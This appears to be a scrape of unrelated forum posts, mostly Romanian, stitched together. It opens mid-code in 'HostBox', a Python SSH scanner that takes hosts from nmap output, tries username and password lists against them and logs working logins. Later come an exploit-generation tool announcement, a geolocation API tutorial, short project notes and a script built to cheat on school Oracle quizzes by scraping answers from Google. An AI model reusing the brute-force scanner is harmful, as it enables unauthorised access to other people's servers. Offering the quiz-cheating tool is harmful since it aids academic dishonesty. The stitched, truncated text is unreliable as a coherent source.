found login combination: %s / %s" % (h,u,p)) flogfile.write("On Host: %s found login combination: %s / %s\n" % (h,u,p)) ssh.close() if skipacc: breakacc = True if skipsrv: breaksrv = True except: pass if breaksrv: breaksrv = False break except Exception, e: print "%s: Host Unreachable. Skipping to next!" % (h) next print "Scan %s has finished." % (localtime) flogfile.close() def main(argv): app = wx.App() HostBox(None, -1, 'Oskar Stridsman\'s IT Resource: HostBox SSH Scanner') skipacc = False skipsrv = False infile = "" hostlist = [] try: opts,args = getopt.getopt(argv,"hi:u:p:12",["ifile=","ufile=","pfile="]) print opts,args if opts == []: app.MainLoop() else: for opt, arg in opts: if opt == '-h': printHelp() sys.exit() elif opt in ("-i", "--ifile="): infile = arg elif opt in ("-u", "--ufile="): usernames = arg elif opt in ("-p", "--pfile="): passwords = arg elif opt in ("-1"): skipacc = True elif opt in ("-2"): skipsrv = True if infile == "": printHelp() sys.exit() if usernames == "": printHelp() sys.exit() if passwords == "": printHelp() sys.exit() fobject = open(infile, "r") hostlines = fobject.readlines() if "# Nmap" in hostlines[0]: succimport = False for l in hostlines: if "Ports: 22/open/" in l: ip = l.split(' ') hostlist.append(ip[1]) succimport = True if succimport == False: print 'No open ssh ports found in the selected iplist (or not a greppable nmap log!' sys.exit() else: for lines in hostlines: lines = lines.strip('\n') hostlist.append(lines) consoleScan(hostlist,usernames,passwords,skipacc,skipsrv) except getopt.GetoptError: printHelp() sys.exit(2) if __name__ == "__main__": main(sys.argv[1:]) Download HostBox-0.1.1.tar.gz (3.9 KB) Source

Hello! I'm asking for help/collaboration from the community to expand and improve our tool called "Symbolic Exploit Assistant" (SEA) for assisted exploit generation of binary programs. In a few words, this tool starts with a path in a disassembled binary represented with an abstract intermediate language (we start supporting REIL) to generate and solve SMT constraints according to the user request. If the solver finds a solution, the values for the input variables can be used to exploit the path of the program selected. Of course, SEA is not state of the art but a few examples from Gera's Insecure Programming can be "solved". We tried to look for other open source and public tools like SEA, but we couldn't find any. We believe that there should be completely open tools that help people to find vulnerabilities easier and quicker. We don't like the idea that only some companies and governments have access to such tools. This is a very small step in the direction of the democratisation of the access to exploitation tools. Finally, we ask the community for help to do research, development and implementation of SEA in order to build a tool to perform binary analysis. The code and some documentation is available in: https://github.com/neuromancer/sea Thanks!

În acest tutorial voi descrie pa?ii necesari pentru a crea o interfa?? API, ce va oferi informa?ii despre IP-ul, ?ara, regiunea, ora?ul ?i coordonatele (?ti?i voi: adresa, blocul, etajul, apartamentul) utilizatorului. De asemenea, v-a fi verificat dac? acesta folose?te un proxy sau dac? IP-ul lui nu este un proxy public. ?i pentru ca lista s? fie complet?, se vor ob?ine ?i informa?iile despre versiunea browser-ului, limba setat? ?i referer-ul acestuia. Pentru cei ner?bd?tori, vreau s? men?ionez c? la final rezultatul returnat de interfa?a API va ar?ta în felul urm?tor, iar un exemplu de aplica?ie ce folose?te acest API poate fi g?sit aici: My IP Vreau s? men?ionez c? interfa?a va fi dezvoltat? cu ajutorul unei aplica?ii pentru Google App Engine, iar limbajul de programare va fi Python. Dac? nu cunoa?te?i Python, pute?i utiliza Java sau Go (desigur, va trebui s? v? descurca?i singuri). Pasul 1. Înregistrarea unei noi aplica?ii Pentru început e nevoie s? înregistr?m o nou? aplica?ie. Acest lucru poate fi f?cut accesând aceast? adres? URL https://appengine.google.com/start/createapp — unde trebuie s? alegem identificatorul unic ?i numele aplica?iei. Pentru op?iunea „Storage Options” bif?m „High Replication” (Master/Slave e considerat? „învechit?” ?i probabil în viitorul apropiat aplica?iile ce utilizeaz? aceast? metod? nu vor mai fi func?ionabile). Pasul 2. Desc?rcarea ?i instalarea SDK-ului Dup? ce am înregistrat aplica?ia, desc?rc?m SDK-ul pentru Google App Engine de pe pagina Downloads. Aici alegem SDK-ul pentru limbajul de programare dorit (în cazul meu Python) ?i sistemul de operare (în cazul meu Windows). Pasul 3. Crearea unei noi aplica?ii Acum, dup? ce am desc?rcat ?i instalat SDK-ul GAE, cre?m o nou? aplica?ie local?. Pentru aceasta rul?m executabilul Google App Engine Launcher ?i din meniul „File” alegem op?iunea „Create New Application”. În fereastra ce apare, introducem identificatorul ales la pasul 1, loca?ia unde dorim s? salv?m aplica?ia, introducem portul necesar ?i ap?s?m „Create Application”. Vreau s? men?ionez c? eu am ales portul 8090, astfel pentru exemplele de mai jos voi folosi acest port. Pasul 4. Testarea aplica?iei ?i acum a venit timpul s? rul?m aplica?ia implicit? pentru a fi siguri c? totul e ok: select?m aplica?ia creat? ?i ap?s?m click pe „Run”. A?tept?m pu?in, ?i dac? a fost indicat calea corect? ?i un port liber — aplica?ia va deveni activ?. Iar pentru a fi siguri c? totul func?ioneaz? perfect, ap?s?m butonul „Browse” sau acces?m http://localhost:8090/ — dac? browser-ul arat? mesajul „Hello world!” — atunci e ok, ?i putem trece la urm?torul pas. Pasul 5. Preg?tirea spa?iului de lucru Deschidem folderul unde am salvat aplica?ia (acest lucru poate fi f?cut ?i cu ajutorul SDK-ului: din meniul „Edit” alegem „Open in Explorer”) ?i ?tergem fi?ierele de care nu mai avem nevoie: favicon.ico main.py main.pyc Deschidem fi?ierul app.yaml ?i înlocuim con?inutul acestuia cu urm?torul cod: # Identificatorul aplicatiei (ales la pasul 1) application: json-api # Despre chestiile de mai jos (si multe alte lucruri utile) puteti citi accesand URL-ul # https://developers.google.com/appengine/docs/python/config/appconfig version: 1 runtime: python27 threadsafe: false api_version: 1 handlers: # Indicam ca in folderul /static sunt salvate fisiere statice precum imagini, css, js si altele - url: /static static_dir: static # Daca utilizatorul acceseaza /ip.js atunci executam scriptul ip.py - url: /ip\.js script: ip.app # Pentru celelalte pagini accesate de catre utilizator afisam pagina implicita - url: /.* static_files: static/html/index.html upload: static/html/index.html Dup? aceasta, cre?m fi?ierul static/html/index.html în care scriem mesajul de întâmpinare (sau folosim sursa paginii de aici http://json-api.appspot.com/). Acces?m http://localhost:8090/ dac? apare mesajul introdus, mergem mai departe. Exact la fel proced?m ?i cu fi?ierul static/html/ip.html (sursa o g?sim aici http://json-api.appspot.com/static/html/ip.html) care va fi folosit pentru a afi?area informa?iei ob?inute de la interfa?a API. Dat fiind faptul c? cu ajutorul Google App Engine putem ob?ine doar ini?ialele ??rii, cre?m un fi?ier static/js/iso3166_codes.js folosind datele de aici http://json-api.appspot.com/static/js/iso3166_codes.js care vor fi folosite la ob?inerea numelui ??rii. De asemenea, cre?m ?i fi?ierul static/js/ip.js (sursa http://json-api.appspot.com/static/js/ip.js) care va avea rolul de a primi ?i afi?a datele returnate de interfa?a API. Pasul 5. Crearea interfe?ei API Cre?m fi?ierul ip.py în care copiem urm?torul cod: #!/usr/bin/env python # -*- coding: utf-8 -*- # Includem bibliotecile necesare import webapp2, json, urllib2, re class InitApp(webapp2.RequestHandler): def get(self): req = self.request # Lista variabililor pe care o va returna interfata API info = { 'ip' : req.remote_addr, 'country' : req.headers.get('X-AppEngine-Country'), 'region' : req.headers.get('X-AppEngine-Region'), 'city' : req.headers.get('X-AppEngine-City'), 'coordinates' : req.headers.get('X-AppEngine-CityLatLong'), 'browser' : req.headers.get('User-Agent'), 'lang' : self.getLang(), 'referer' : req.referer, 'isproxy' : self.isProxy(), } # Verificam daca utilizatorul nu foloseste un proxy "transparent" if req.headers.get('X-Forwarded-For'): info['realip'] = req.headers.get('X-Forwarded-For').split(',')[0] # Obtinem reprezentarea JSON pentru variabilele necesare result = json.dumps(info) # Verificam daca utilizatorul a specificat o functie callback. Exemplu: # Request : http://json-api.appspot.com/ip.js?varname=data # Rezultat : callback({...}); if req.get('callback'): result = '{0}({1});'.format(self.getVar('callback'), result) # Verificam daca utilizatorul a specificat o variabila. Exemplu: # Request : http://json-api.appspot.com/ip.js?varname=data # Rezultat : var data = {...}; elif req.get('varname'): result = 'var {0} = {1};'.format(self.getVar('varname'), result) # Afisam rezultatul ca fiind plain-text self.response.headers['Content-Type'] = 'text/javascript; charset=utf-8' self.response.out.write(result) # Eliminam caracterele nevalide din numele functiei callback si numele variabilei def getVar(self, var): return self.filter(self.request.get(var)) # Obtinem initialele pentru limba folosita def getLang(self): lang = self.request.headers.get('Accept-Language') return self.filter(lang.split(',')[0]) # Eliminam caracterele non-alfanumerice def filter(self, str): return re.sub('[^a-z_\.0-9]', '', str, flags=re.IGNORECASE) # Verificam utilizatorul foloseste un proxy public def isProxy(self): # Intrebam pe domnul Google folosind sintaxa inurl:proxy 127.0.0.1 # daca IP-ul nu este un proxy public q = urllib2.quote('inurl:proxy ' + self.request.remote_addr) url = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=' + q # Folosim contructia try pentru a ne feri de erorile imprevizibile try: # Obtinem un sir JSON returnat de catre serverul Google str = urllib2.urlopen(url).read() # Convertim intr-o variabila datele JSON data = json.loads(str) # Verificam daca au fost gasite mai mult de 5 rezulate return (data['responseData']['cursor']['resultCount'] > 5) except: pass # Deja nu mai are importanta - au fost ceva erori sau Google nu a gasit nimic - # consideram ca IP-ul nu este un proxy return False app = webapp2.WSGIApplication([('/ip.js', InitApp)], debug=True) Pasul 6. Înc?rcarea aplica?iei pe server Dup? ce am salvat toate fi?ierele ?i am testat aplica?ia accesând URL-ul http://localhost:8090/static/html/ip.html putem înc?rca toate fi?ierele pe serverul appspot cu un simplu click pe butonul „Deploy”. În fereastra ce apare, introducem adresa de email ?i parola pentru contul Google. Dup? înc?rcarea fi?ierelor, putem accesa aplica?ia noastr? folosind adresa http://json-api.appspot.com/ (în loc de json-api folosi?i identificatorul ales la pasul 1). Pasul 7. Final Pentru cei un pic mai leno?i, sursa aplica?iei poate fi desc?rcat? accesând adresa URL http://json-api.appspot.com/static/zip/json-api.zip Enjoy!

V?zând c? nu este nici un post despre aplica?ia Blockly, am hot?rât s? repar aceast? gre?eal?. Deci, Blockly este o aplica?ie WEB ce reprezint? un editor grafic de programare. Pentru a crea o aplica?ie, utilizatorul nu prea va avea nevoie de tastatur?, ci mai mult de un mouse cu care s? mi?te ?i s? aranjeze „blocurile” cu instruc?iuni logice, condi?ionale sau repetitive. Foarte interesant? ?i util? este posibilitatea de a exporta blocurile în JavaScript, Dart sau Python. De exemplu, urm?toarea construc?ie: exportat? în JavaScript, v-a ar?ta a?a: var msg; var Letters; var i; msg = ''; Letters = ['R','S','T'].join(''); for (var i_index in Letters) { i = Letters[i_index]; msg = msg + i; } window.alert(msg); iar în Python, a?a: msg = None Letters = None i = None msg = '' Letters = ''.join([str(temp_value) for temp_value in ['R', 'S', 'T']]) for i in Letters: msg = msg + i print(msg) Cei ce cunosc Python sau/?i JavaScript — v? rog s? nu analiza?i exemplele de mai sus. Dup? cum v? da?i bine seama, Blockly nu e tocmai reu?it pentru a sparge o parol? Yahoo sau pentru a g?si vulnerabilit??i în serverele NASA. Pe de alt? parte, de exemplu, Blockly e o aplica?ie perfect? pentru dezvolta logica de programator sau pentru a fi folosit? de c?tre profesori (?i nu numai) pentru a preda programarea. La final v? propun Blockly Maze — ie?i?i din labirint într-un mod cât mai eficient (rapid ?i folosind cât mai pu?ine instruc?iuni logice). R?spunsurile le posta?i în comentarii ad?ugând screenshot-ul rezolv?rii. Dac? ob?ine?i mai mult de 12 blocuri — pute?i seta screenshot-ul ca background pe desktop (?i desigur, f?r? a mai publica r?spunsul aici).

Tocmai am scris un cod pentru un program in python. Cum il pot executa ca un program normal (.exe)? P.S. Sa poate fi salvat .exe adica pur si simplu sa dau click pe el si sa se deschida programul.

Sql_err404

Rogentos este o distributie de linux romaneasca bazata pe Sabayon (Gentoo), cam singura la ora actuala, mai era o incercare de server. Mai multe detalii vezi pe site, sursele pachetelor si programelor aflate in dezvoltare se gasesc atat pe github cat si in repozitoriile userilor din organizatie. Este un proiect cu sursa libera la care poate lua parte oricine ca tester sau dezvoltator sau orice ce poate veni in ajutorul comunitatii. Distributia este inca la inceput si nu are prea multe lucruri "originale", dar in momentul asta sunt binevenite raportarile bugurilor si testele asupra distributiei pe diferite masini, in special laptopuri (pentru eventuale probleme cu driverele video).

Soft compatibil cu Linux si Windows capabil sa gestioneze intr-un mod usor fisierul hosts, responsabil cu "maparea" serverelor. Necesita Python 2.x (si Tkinter in caz de nu e instalat), mai multe aici: https://github.com/cmin764/xhosts. Are in plus fata de altele (cam putine si nu prea am gasit si pe linux) posibilitatea de a face rost de servere cautand cuvinte (pe Google) direct din program, dar scopul principal al postarii lui aici sunt sursele, consistent comentate ce vin in ajutorul celor ce vor sa mai invete ceva in Python prin codul lor reutilizabil. Cine doreste sa faca si sa posteze o versiune standalone (cu executabil) pentru Windows e binevenit.

Nu am vazut sa se mai fi postat, daca da atunci search engineul e de vina . Topic din grupul Python Romania https://groups.google.com/forum/?fromgroups#!topic/python-romania/C-raRPgTEYU .

Pentru cei ce dau quizuri SQL la scoala pentru acea diploma oracle-shit. linux/windows/mac ©miN 2012 V-ati saturat sa tot selectati tabul cu google, sa dati copy paste la intrebare, apoi sa alegeti un site relevant, apoi sa gasiti intrebarea, apoi sa-i cautati raspunsul, sa-l alegeti dupa sau dupa cum vine pus in pagina si apoi sa va intoarceti la tabul cu quizul deschis si apoi sa bifati si acolo raspunsul corect ? Cu acest soft e nevoie doar de un simplu Ctrl-C Ctrl-V si dupa ce dati enter in mai putin de o secunda primiti raspunsul corect. Scriptul poate fi foarte usor adaptat si la altfel de perechi intrebare-raspuns(uri), singurul lucru ce trebuie modificat (adaugat) este functia de parsare a paginii cu intrebarea identica gasita acolo, astfel incat sa poata extrage raspunsul de sub intrebare cu un anumit model codat de voi desigur. Chiar daca nu va intereseaza niciuna din cele de mai sus, softul este robust, bine pus la punct, cod clar si comentat, logica in ordinea actiunilor si este un foarte bun exemplu pentru amatorii de programare concurenta si legatura minima de 0-dependenta intre interfata-motor desi exista sincronizari primitive live. [Python] oaf - Pastebin.com #! /usr/bin/env python # Oracle Answer Finder # 02.05.2012 cmiN from Tkinter import * from urllib2 import build_opener, HTTPError, URLError from urlparse import urlparse from threading import Thread, Event from socket import setdefaulttimeout, timeout # constants SMAX = 8 # maximum number of results DIFF = 512 # how many chars to skip until the answer TOUT = 2 # timeout in seconds class GUI(Frame): def __init__(self, master=None, margin=10): Frame.__init__(self, master) self.app = Engine() # main app self.thread = None # Thread object used for parallel processing self.master.title("OAF - cmiN") self.grid(padx=margin, pady=margin) self.widgets() self.mainloop() def callback(self, event): """What happens after you press Enter in Question's entry.""" # get and edit question qon = self.app.edit_qon(self.qEntry.get()) if self.thread: # if it was initialized before # check question if qon == self.app.qon[0]: # same question (no reset) if self.thread.is_alive(): # let it finish return else: self.app.data = "" # empty buffer self.app.dataLen = 0 else: # another if self.thread.is_alive(): self.app.stop() self.thread.join() self.app.reset() # reset everything # set question self.app.set_qon(qon) # process data self.thread = Thread(target=self.app.process) self.thread.start() # no return def widgets(self): # variables self.statusVar = StringVar(value="Ready.") # passed to Thread class for live updating #self.ansVar = StringVar() # same thing, but for answer self.app.statusVar = self.statusVar #self.app.ansVar = self.ansVar # label-entry pairs self.qLabel = Label(self, text="Question:") self.qEntry = Entry(self, width=100) self.aLabel = Label(self, text="Answer:") #self.aEntry = Entry(self, width=100, textvariable=self.ansVar) self.qLabel.grid(row=0, column=0, sticky="w") self.qEntry.grid(row=1, column=0) self.aLabel.grid(row=2, column=0, sticky="w") #self.aEntry.grid(row=3, column=0) # status widget self.sLabel1 = Label(self, text="Status:") self.sLabel2 = Label(self, width=86, textvariable=self.statusVar, relief="sunken", bd=2, anchor="c") self.sLabel1.grid(row=4, column=0, sticky="w") self.sLabel2.grid(row=5, column=0, sticky="w") # text instead entry for answer self.ansText = Text(self, width=75, height=10) self.ansText.grid(row=3, column=0) self.app.ansText = self.ansText # make it available to the engine # behavior self.qEntry.bind("<Return>", self.callback) self.qEntry.bind("<KP_Enter>", self.callback) class Engine: def __init__(self): setdefaulttimeout(TOUT) self.opener = build_opener() self.opener.addheaders = [("User-agent", "Mozilla/5.0")] self.qon = ["", ""] # question self.data = "" # data contain the question [and answer] self.dataLen = 0 # data length self.start = 0 # google first result self.first = "url?q=" # from self.second = "&amp" # to self.seen = set() # evidence of visited links self.statusVar = None # through this set status self.ansVar = None # through this set answer if available self.ansText = None # almost same shit self.__stop = Event() # stop the process self.upEvent = Event() # solve the deadlock self.upEvent.set() # means it's safe (.wait will wait until .set is called or .is_set() is True) def update(self, status, answer): """Here is a fucking deadlock, when the same function is called simultaneously.""" self.upEvent.wait() # wait to be setted self.upEvent.clear() # make it busy # do your ugly things if hasattr(self.statusVar, "set") and hasattr(self.statusVar, "get"): self.statusVar.set(status) self.statusVar.get() # just to make sure the update finished if hasattr(self.ansVar, "set") and hasattr(self.ansVar, "get"): self.ansVar.set(answer) self.ansVar.get() if hasattr(self.ansText, "insert") and hasattr(self.ansText, "delete"): self.ansText.delete(0.0, END) self.ansText.insert(0.0, answer) self.upEvent.set() # make it available def stop(self): self.update("Stopping...", "") self.__stop.set() def stopped(self): return self.__stop.is_set() def reset(self): self.__stop.clear() self.start = 0 self.seen = set() #self.update("Ready.", "") def edit_qon(self, qon): return qon.strip().split("\n")[0] # idiot proof def set_qon(self, qon): """Set question.""" self.qon[0] = qon self.qon[1] = '"' + self.qon[0].replace(" ", "+") + '"' def find(self): """Find links corresponding to query using google. Returns: 0 -> match, link extracted, data updated 1 -> no match for exact string 2 -> url already visited or invalid url 3 -> banned 4 -> maximum number of results exceeded """ if self.start >= SMAX: return 4 link = "http://www.google.com/search?q={}&start={}".format(self.qon[1], self.start) try: fobj = self.opener.open(link) except HTTPError: self.update("Google banned you.", "") return 3 except timeout: self.update("Timed out or Google banned you.", "") return 3 else: data = fobj.read() # google's source fobj.close() # find a relevant closest position to the link index1 = data.find(self.first) if index1 == -1: # no results in page or modified pattern return 1 # invalid source self.start += 1 # now do the increment index1 += len(self.first) index2 = data.find(self.second, index1) url = data[index1:index2] # edit url newurl = "" i = 0 length = len(url) while i < length: if url[i] == "%": char = chr(int(url[i + 1] + url[i + 2], 16)) i += 2 else: char = url[i] newurl += char i += 1 url = newurl # process it if url in self.seen: # link already visited return 2 self.seen.add(url) upo = urlparse(url) self.update("Looking in %s..." % upo.netloc, "") try: fobj = self.opener.open(url) except URLError: self.update("Invalid link.", "") return 2 except timeout: self.update("Timed out.", "") return 3 else: self.data = fobj.read() self.dataLen = len(self.data) fobj.close() return 0 # all fine def check(self, old, index): if index < 0 or index >= self.dataLen: return False # invalid index if abs(old - index) > DIFF: return False # too far return True # ok def get_star(self, index): """Find the line with . Returns: str -> good answer False -> invalid answer or couldn't find """ ansNr = 1 # default answers (for multiple ones) chunk = "(Choose " firstTag = self.data.find("<", index) chunkIndex = self.data.find(chunk, index, firstTag) if chunkIndex != -1: chunkIndex += len(chunk) number = "" while self.data[chunkIndex] != ")": number += self.data[chunkIndex] chunkIndex += 1 number = number.strip().lower() if number == "two": ansNr = 2 elif number == "three": ansNr = 3 elif number == "four": ansNr = 4 # i don't think this actually exists star = "(*)" last = index ans = "" while ansNr: index = self.data.find(star, last) - 1 last = index + 1 + len(star) if index < 0: return False # invalid answer type # ok now we're good old = index while True: tag = True while self.data[index] != ">": if tag and self.data[index].isspace(): index -= 1 continue if tag: ans = "\n" + ans tag = False # found alphanumeric ans = self.data[index] + ans index -= 1 if not self.check(old, index): return False ans = ans.strip() if tag and len(ans) > 0: break while self.data[index] != "<": index -= 1 index -= 1 ansNr -= 1 ans = "\n" + ans return ans.strip() def get_single(self, index): """Line with single answer. Returns: str -> good answer False -> invalid answer or couldn't find """ new = True # first answer (if multiple) ans = "" smooth = 1 # tag number difference while True: old = index # go to the first tag while self.data[index] != "<": index += 1 if not self.check(old, index): return False # no skip all of them nrTag = 0 while self.data[index] == "<": while self.data[index] != ">": index += 1 index += 1 nrTag += 1 # add tag if not self.check(old, index): return False if new: new = False # not new anymore model = nrTag if abs(nrTag - model) > smooth: break # no incoming answers to this question while self.data[index] != "<": ans += self.data[index] index += 1 if not self.check(old, index): return False # add separator (don't worry, we will strip it at the end) ans = ans.strip() + "\n\n" ans = ans.strip() if ans == "": return False # empty one return ans def process(self): """Try to find answers to quiz questions by searching them on google. Format string, search it on google, locate first %d results, then search among them for patterns (question<>...<>answer<> or question<>answer...<>). Returns: str -> answer found (or false positive) 1 -> invalid/inexistent question (or google invalid source pattern) 2 -> answer not found (or different search pattern) 3 -> stopped 4 -> banned """ % SMAX ret = 0 # virtual return while True: if self.stopped(): return 3 # stopped if ret == 1: self.update("Invalid question.", "") return 1 # invalid question elif ret == 2: # already seen or invalid ret = self.find() continue elif ret == 3: return 4 # timed out or banned (too many queries) elif ret == 4: self.update("Nothing found.", "") return 2 # not found index = self.data.find(self.qon[0]) if index >= 0: #index += len(self.qon[0]) # conflict with star (need some data from question) ans = self.get_star(index) if not ans: ans = self.get_single(index) if ans: self.update("Answer found!", ans) return ans # string ok ret = self.find() if __name__ == "__main__": GUI(Tk()) Dupa ce consider ca nu da gres deloc si nu face vreo faza prea ciudata (in limita bunului simt al utilizatorului) inghet versiune cu executabil pentru windows, deocamdata raportati-mi buguri, critici si pareri, totusi daca nu aveti rabdare sa va puneti Python si pe alte masini puteti sa va rezolvati foarte repede cu cx_Freeze. Nou! Daca nu va place raspunsul primit mai puteti apasa o data enter la aceeasi intrebare si el va cauta prin urmatoarele rezultate dupa un nou raspuns. In timp ce cauta daca schimbati intrebarea si dati iar enter atunci ii da un semnal sa inceteze cautarea curenta si apoi trece la cea noua (experimental, mai ingheata uneori (deadlocks)). V-am promis si versiunea portabila pentru windows: box gf